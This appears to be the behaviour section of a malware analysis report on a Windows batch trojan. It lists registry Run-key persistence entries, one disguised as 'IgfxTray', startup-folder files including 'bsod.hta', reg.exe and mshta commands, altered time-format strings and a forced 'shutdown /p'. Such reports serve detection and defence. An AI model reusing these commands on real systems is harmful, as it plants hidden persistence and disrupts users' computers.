Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'YourOwnLifeOrganizer' = '%appdata%\%troll%.bat'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'IgfxTray' = '<SYSTEM32>\%troll%.bat'
- %APPDATA%\microsoft\windows\start menu\programs\startup\3185418929.bat
- %APPDATA%\microsoft\windows\start menu\programs\startup\bsod.hta
- nul
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v YourOwnLifeOrganizer /t REG_SZ /d "%appdata%\%troll%.bat"
- '<SYSTEM32>\reg.exe' add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f /v IgfxTray /t REG_SZ /d "<SYSTEM32>\%troll%.bat"
- '%WINDIR%\syswow64\mshta.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\bsod.hta"
- '<SYSTEM32>\reg.exe' add "HKCU\Control Panel\international" /v s1159 /t REG_SZ /d "YOLO BatchMan" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Control Panel\international" /v s2359 /t REG_SZ /d "YOLO BatchMan" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Control Panel\international" /v sTimeFormat /t REG_SZ /d "HH:mm tt" /f
- '<SYSTEM32>\timeout.exe' 5
- '<SYSTEM32>\shutdown.exe' /p